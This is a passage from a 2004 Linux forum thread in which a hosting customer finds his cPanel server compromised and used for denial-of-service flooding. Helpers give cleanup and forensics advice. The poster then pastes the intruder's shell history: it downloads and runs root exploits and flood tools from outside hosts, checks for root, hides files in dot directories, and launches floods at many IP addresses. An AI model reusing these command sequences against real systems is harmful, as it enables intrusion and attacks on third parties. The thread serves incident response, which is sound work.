/usr/local/cpanel/3rdparty/mailman/templates/no
/usr/local/cpanel/3rdparty/mailman/templates/pl
/usr/local/cpanel/3rdparty/mailman/templates/pt
/usr/local/cpanel/3rdparty/mailman/templates/pt_BR
/usr/local/cpanel/3rdparty/mailman/templates/ru
/usr/local/cpanel/3rdparty/mailman/templates/sr
/usr/local/cpanel/3rdparty/mailman/templates/sv
/usr/local/cpanel/3rdparty/mailman/templates/uk
/usr/local/cpanel/3rdparty/mailman/templates/ca
/usr/local/cpanel/3rdparty/mailman/templates/hr
/usr/local/cpanel/3rdparty/mailman/templates/ro
/usr/local/cpanel/3rdparty/mailman/templates/sl
/usr/local/cpanel/3rdparty/mailman/templates/tr
/usr/local/cpanel/3rdparty/mailman/pythonlib
/usr/local/cpanel/3rdparty/mailman/pythonlib/email
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/python
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/c
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/mappings
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/aliases
/usr/local/cpanel/3rdparty/mailman/pythonlib/lib
/usr/local/cpanel/3rdparty/mailman/pythonlib/lib/python2.2
/usr/local/cpanel/3rdparty/mailman/pythonlib/lib/python2.2/site-packages
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean/mappings
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean/c
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean/python
/usr/local/cpanel/3rdparty/mailman/messages
/usr/local/cpanel/3rdparty/mailman/messages/cs
/usr/local/cpanel/3rdparty/mailman/messages/cs/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/da
/usr/local/cpanel/3rdparty/mailman/messages/da/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/de
/usr/local/cpanel/3rdparty/mailman/messages/de/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/es
/usr/local/cpanel/3rdparty/mailman/messages/es/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/et
/usr/local/cpanel/3rdparty/mailman/messages/et/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/eu
/usr/local/cpanel/3rdparty/mailman/messages/eu/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/fi
/usr/local/cpanel/3rdparty/mailman/messages/fi/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/fr
/usr/local/cpanel/3rdparty/mailman/messages/fr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/hu
/usr/local/cpanel/3rdparty/mailman/messages/hu/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/it
/usr/local/cpanel/3rdparty/mailman/messages/it/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ja
/usr/local/cpanel/3rdparty/mailman/messages/ja/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ko
/usr/local/cpanel/3rdparty/mailman/messages/ko/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/lt
/usr/local/cpanel/3rdparty/mailman/messages/lt/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/nl
/usr/local/cpanel/3rdparty/mailman/messages/nl/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/no
/usr/local/cpanel/3rdparty/mailman/messages/no/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/pl
/usr/local/cpanel/3rdparty/mailman/messages/pl/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/pt
/usr/local/cpanel/3rdparty/mailman/messages/pt/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/pt_BR
/usr/local/cpanel/3rdparty/mailman/messages/pt_BR/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ru
/usr/local/cpanel/3rdparty/mailman/messages/ru/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/sr
/usr/local/cpanel/3rdparty/mailman/messages/sr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/sv
/usr/local/cpanel/3rdparty/mailman/messages/sv/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/uk
/usr/local/cpanel/3rdparty/mailman/messages/uk/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ca
/usr/local/cpanel/3rdparty/mailman/messages/ca/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/hr
/usr/local/cpanel/3rdparty/mailman/messages/hr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ro
/usr/local/cpanel/3rdparty/mailman/messages/ro/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/sl
/usr/local/cpanel/3rdparty/mailman/messages/sl/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/tr
/usr/local/cpanel/3rdparty/mailman/messages/tr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/tests
/usr/local/cpanel/3rdparty/mailman/tests/bounces
/usr/local/cpanel/3rdparty/mailman/tests/msgs
/usr/local/cpanel/3rdparty/mailman/suspended.lists
/usr/local/cpanel/3rdparty/phpMyAdmin
/usr/local/cpanel/3rdparty/phpMyAdmin/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/images
/usr/local/cpanel/3rdparty/phpMyAdmin/images/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/lang
/usr/local/cpanel/3rdparty/phpMyAdmin/lang/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/libraries
/usr/local/cpanel/3rdparty/phpMyAdmin/libraries/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/scripts
/usr/local/cpanel/3rdparty/phpMyAdmin/scripts/CVS
/usr/sbin/sendmail
/usr/sbin/utempter
/etc/proftpd
find: /proc/3209/fd: No such file or directory
find: /proc/6268/fd: No such file or directory
find: /proc/25154/fd/4: No such file or directory


That is all...something bad?

Thank you very much...
 
Old 07-17-2004, 02:44 PM   #10
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
Well it's pretty clear that the system has been cracked. Vadmin and udp.pl are flooders used in DoS attacks. Since new files were uploaded, I'm guessing that you have not taken the system offline. Let me be clear about this:

Your system is being used to attack other computers. You MUST take it offline NOW and leave it offline until you are sure that it is clean!

In fact, if you look at the process you've listed, you can see the IP address of the system you're being used to attack.
 
Old 07-17-2004, 03:08 PM   #11
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
Get a listing of all currently running processes and check the integrity of rpms with rpm -Va. once you've got the system offline, you can either remove the compromised systems hard-drive, replace it with a new one, then format and re-install from trusted media or you can make an image of the drive using something like dd, then wipe the compromised drive by completely re-formatting and re-installing from trusted media (not from a back up). You can then get the system back online. I would HIGHLY recommend you spend some time properly securing the system before putting it back online, otherwise you'll probably be doing this again sometime soon.

If you want to do any kind of further analysis, boot your system with a cd-rom based linux distro like knoppix or FIRE and then mount the compromised hd, read-only. You can then take a look at the filesystem, system logs, and root's bash_history. You might also want to take a look at the ikonboard.cgi file (ikonboard is a bulletin board app), especially if you are not running ikonboard. Btw, you said both ikonboard and udp.pl were running under the same user, but your never said what user that is.
 
Old 07-17-2004, 03:44 PM   #12
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Original Poster
Rep: Reputation: 0
Big problme, that is BIG PROBLEEEEM....offline, f***...

Yes...user...he run it every time with same username (one site) and evry time in "var/tmp", before I run "scripts/securetmp" he run it in "tmp"!!!
But THAT SITE IS MY SITE!! Yes, I change password, that don`t help!
In logs for that site I can`t find nothing!

Also, I can`t remove HD, server is not my, I pay one company for that server...
But, I have much sites on that server....and some of that sites is not my!
How much time server must be offline and can I restore all accounts and data for all sites?

This can be big problem, somebody can think that I attack that servers...and I can lose this server from this company!

Also, yes, I use ikonboard board!

Last edited by xmanxl; 07-17-2004 at 03:48 PM.
 
Old 07-17-2004, 04:23 PM   #13
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
Have you tried looking at the users bash history or just removing the user entirely? Have you contacted the user and asked him wtf he's doing?

FWIW, /var/tmp is often writable to normal users (check /var/tmp permissions) and if you allow normal users to have access to /usr/sbin/perl, they'll be able to run that udp.pl script without needing root access.

Last edited by Capt_Caveman; 07-17-2004 at 04:25 PM.
 
Old 07-17-2004, 06:22 PM   #14
sh1ft
Member
 
Registered: Feb 2004
Location: Ottawa, Ontario, Can
Distribution: Slackware, ubuntu
Posts: 391

Rep: Reputation: 31
Let this be a lesson to people to make your /tmp and /var directories on a seperate partition and add the noexec flag to fstab. That will stop a heck of a lot of script kiddies in their tracks.
 
Old 07-17-2004, 09:25 PM   #15
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Original Poster
Rep: Reputation: 0
Yes, yes yes.....I find it I find it......in ".bash_history" for this account I find this:
kill
29515 kill 29515
kill 29515
ls
ls
cd /tmp
ls
rm *
ls
cd /var/tmp
ls
uanem -a
uname -a
wget http://www.kpteam.org/xpl/w00t.zip
unzip http://www.kpteam.org/xpl/w00t.zip
unzip w00t.zip
chmod +x w00t
./w00t
id
wget http://www.rootthief.com/binarys/mremap_pte
chmod +x mremap_pte
./mremap_pte
id
wget http://www.rootthief.com/binarys/NmapYa
chmod +x NmapYa
./NmapYa
id
nmap
./ NmapYa
wget http://www.rootthief.com/binarys/cvs
chmod +x cvs
./cvs
./cvs
./cvs forum.aboutpc.net
ls
rm *
ls
wget http://www.rootthief.com/binarys/ptrace
chmod +x ptrace
./ptrace
id
./ptrace; id
ls
ps
kill 23425
rm *
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
rm vadimI.zip
chmod +x vadimI
./vadimI
./vadimI 200.214.14.71 80 200.214.14.7
ps
kill 27391
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x f3
ls
./vadimI 200.164.65.34 80 200.164.65.3
./f3 200.216.161.140 10000 200
ps
kill 31240
ps
ps
ps
ps
ps
ps
kill -9 31239
kill -9 31240
ps
./f3 161.24.72.80
./f3 161.24.72.80 1000 200
id
ps
./vadimI 200.216.161.140 59 200.216.161.14
w
w
ls
id
uname -a
wget http://www.portalsecurityall.hpg.ig.com.br/exploits/PT
chmod +x PT
./PT
id
rm PT
exit
wget http://www.portalsecurityall.hpg.ig....3.10ALPHA7.tgz
ls
rm -rf nmap-3.10ALPHA7.tgz
ls
wget http://www.malukinhow.com/mirc615.exe
ls
rm -rf mirc615.exe
ls
id
ls
ps
./f3
w
ls
./vadimI 200.165.49.5 80 200.165.49.1
ps
ls
./f3
./f3 200.247.39.196
./f3 200.247.39.196 1000 600
id
./f3 200.247.39.196 1000 600
ls
ps
kill 18353
kill 18354
kill 19787
ls
ps
kill -9 18354
kill -9 18353
ps
./f3 200.247.39.196 1000 600
ps
kill -9 21132
ps
./f3 66.90.87.13 1000 600
ps
kill -9 21911
./vadimI 66.90.87.13 1286 66.90.87.1
w
ls
ls -a
ps
exit
ls
ls -a
mkdir ....
cd ....
ls
ls
pwd
w
wget http://www.aloysio.hpg.ig.com.br/f3
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
chmod +x *
ls
rm -rf vadimI.zip
id
./f3
./f3 200.154.201.39 1000 200
ls
ls -a
cd ....
./f3 200.154.201.39 1000 200
id
ps
cd ....
ls
./vadimI 66.45.239.202 6005 66.45.239.20
id
./vadimI 66.45.239.202 6005 66.45.239.20
ps
./f3 201.7.10.73 1000 40
cd ....
./f3 201.7.10.73 1000 40
./vadimI 201.7.10.73 139 201.7.10.73
ps
kill 291243
kill 29124
ps
cd ...
cd ....
./f3 201.7.10.73 10000 100
ps
kill -9 29558
ps
ls
cd ....
./vadimI 200.158.190.101 2004 200.158.190.10
ls
cd ....
ls
ls -a
ps
mkdir .i
cd .i
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x *
ls
./f3
./f3 201.7.89.160 1000 100
ls
wget http://www.enzotech.net/code/neuter.c
ps
kill 15818
ps
w
ls
cd .i
ls
./f3 200.222.176.13 100 10
ls
cd .i
ls
./f3 200.180.52.203 200 300
./f3 200.180.52.203 1000 200
lynx
ls
lynx http://www.rootthief.com/binarys/mremap_pte
w
ls
pwd
cd ....
ls -a
mkdir ...
cd ...
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x *
./f3
./f3 200.140.88.186 500 300
ps
w
ls -a
pwd
mkdir .s
cd .s
wget http://www.aloysio.hpg.ig.com.br/f3
ls
ls -a
cd .s
ls
ps
kill 21493
ps
wget http://www.aloysio.hpg.ig.com.br/f3
./f3 200.228.76.178 500 180
chmod +x f3
./f3 200.228.76.178 500 180
id
cd .s
./f3 200.97.201.28 500 180
./f3 200.97.201.28 500 300
ls
ls -a
mkdir .l
cd .l
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
chmod +x vadimI
./vadimI
ls
./vadimI 66.221.169.110 80 66.221.169.11
ps
kill 20441
ps
kill -9 20322
ps
kill -9 20323
ps
cd .l
ls
./vadimI 66.221.169.110 80 66.221.169.110
./vadimI 66.235.202.52 80 66.235.202.5
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x f3
./f3
./f3 200.221.8.44 500 300
./f3 200.226.137.9 1000 300
./f3 200.223.39.2 1000 100
ls
cd .l
./vadimI
./vadimI 200.192.176.133 80 200.192.176.133
ps
kill 15811
kill -9 14844
kill -9 14845
kill -9 14844
kill -9 15535
ls
ls -a
w
tty
uname -a
ping
mkdir .k
cd .k
ls
wget http://www.luckyan.com/r00t/flood.tgz
tar xfv flood.tgz
tar xzvf flood.tgz
cd dos
ls
./slice2
chmod +x *
./slice2
cd ..
wget http://mihai-doini.org/flood.tgz
ls
rm *
wget http://mihai-doini.org/flood.tgz
tar xzvf flood.tgz
cd flood
ls
chmod +x
chmod +x *
./sl
ls
ls s*
./slice3
./sl3
./stream
ls
./xdestroy
./udp
./juno
./juno 200.222.173.87 139
./xshock
ls
./rc8
./rc8 200.222.173.87
./rc8 200.222.173.87 200.222.173.87
./s
ls
./smack
./smack 200.222.173.87
./alpha
./alpha 200.222.173.87 139 200.222.173.87
l
ls
./nestea
./da.sh
ls
ls -a
cd .k
ls
rm -rf f*
cd dos
ls
mv vadimI ..
cd ..
ls
rm -rf dos
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x f3
ls
./vadimI 200.188.191.131 80 200.188.191.13
./vadimI 200.188.191.131 80 200.188.191.13
./f3 200.188.191.131 1000 300
./f3 200.188.191.131 1000 300
ps
kill -9 11654
kill -9 15977
ps
./vadimI 200.208.28.224 80 200.208.28.22
ps
kill 16235
ps
./vadimI 200.188.191.131 53 200.188.191.13
cd .k
ls
./vadimI 200.188.191.131 53 200.188.191.13
cd .k
./f3 200.99.102.226
./f3 200.99.102.226 500 300
./f3 200.99.102.226 1000 300
./f3 200.99.102.226 1000 300
ls
ls -a
ps
setterm -file `perl -e 'print "A"x249'`
setterm
setterm -file `perl -e 'print "A"x249'`
./vadimI 66.90.122.94 6667 66.90.122.80
cd ....
./vadimI 66.90.122.94 6667 66.90.122.80
./vadimI 66.90.122.94 6667 66.90.122.80
id
ls
ls -a
cd ....
ls
wget http://nene.nu/c4
chmod +x c4
./c4
./c4 66.90.122.94 -p 6665,6667
./c4 66.90.122.94 -p 6665,6667
./c4 66.90.122.94
./c4 -h 66.90.122.94 -p 6665,6667
cd ....
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x *
./f3
./f3 66.90.122.94 1000 300
ls
./vadimI 207.44.244.102 80 207.44.244.10
ps
ls
ls -a
wget eagle.kecapi.com/sec/codes/phpmy-explt.c
gcc -o phpmyphpmy-explt.c
mkdir ....
mv phpmy-explt.c ....
cd ....
ls
gcc
traceroute
ls -a
mkdir .h
ls -a
cd .h
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
wget http://www.aloysio.hpg.ig.com.br/f3
ls
unzip vadimI.zip
./v
rm -rf *.zip
chmod +x *
./v
./vadimI
./f3216.239.39.10465535 600
./f3 200.152.253.20 1000 600
id
uanme -a
showmount
ls
ls -a
pwd
ps
ls
ls -a
mkdir .c
cd .c
pwd
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
wget http://www.aloysio.hpg.ig.com.br/f3
rm *.zip
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
rm *.zip
chmod +x *
ls
./vadimI 24.61.211.193 80 24.61.211.19
w
ls
ps
ps
ps
ls
ls -a
mkdir .l
cd .l
wget http://packetstormsecurity.nl/DoS/udp.pl
chmod +x *
./udp.pl
./udp 200.222.175.87 139 1
./udp.pl 200.222.175.87 139 1
3ps
ps
cd ....
ls
perl udp.pl 200.222.169
ls
ls -pa
ls -a
mkdir ....
cd ....
wget http://geocities.yahoo.com.br/mat_ad0r/udp.pl
chmod +x *
./udp.pl 201.5.121
perl udp.pl 201.5.121
ps
killall -9 perl
ps
ls
cd ....
ls
rm u*
ls
ps
killall -9 vadimI
ps
ls -a
cd ....
ls
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
chmod +x *
rm *.zip
ls
./vadimI 200.103.98.206 6667 200.103.98.20
./vadimI 200.103.98.206 6667 200.103.98.20
./vadimI 200.103.98.206 6667 200.103.98.20
ls
ls -a
cd ....
ls
./vadimI 66.90.84.99 6667 66.90.84.9


but but but, THAT IS MY ACCOUNT!!!!
How he do this? He have SSH access or what? What I can do now? Disable SSH for this account, can I disable all SSH access for this account in WHM....
But I change password for this account....
He use some bad PHP/PERL script for this or what, how I can find that....?
Thanks.

Last edited by xmanxl; 07-17-2004 at 09:40 PM.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Server under some form of attack English_Man Linux - Security 1 10-30-2005 01:03 PM
server crashing...under attack? sneakyimp Linux - Security 4 10-23-2005 04:37 PM
Mysql Server ...virus Attack Found ! my-unix-dream Linux - Newbie 9 05-15-2005 11:35 AM
is this a attack to my web server ohcarol Linux - Security 1 12-29-2004 08:59 AM
connection to server lost every day jdh Linux - Networking 2 02-11-2002 08:01 AM


All times are GMT -5. The time now is 12:22 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration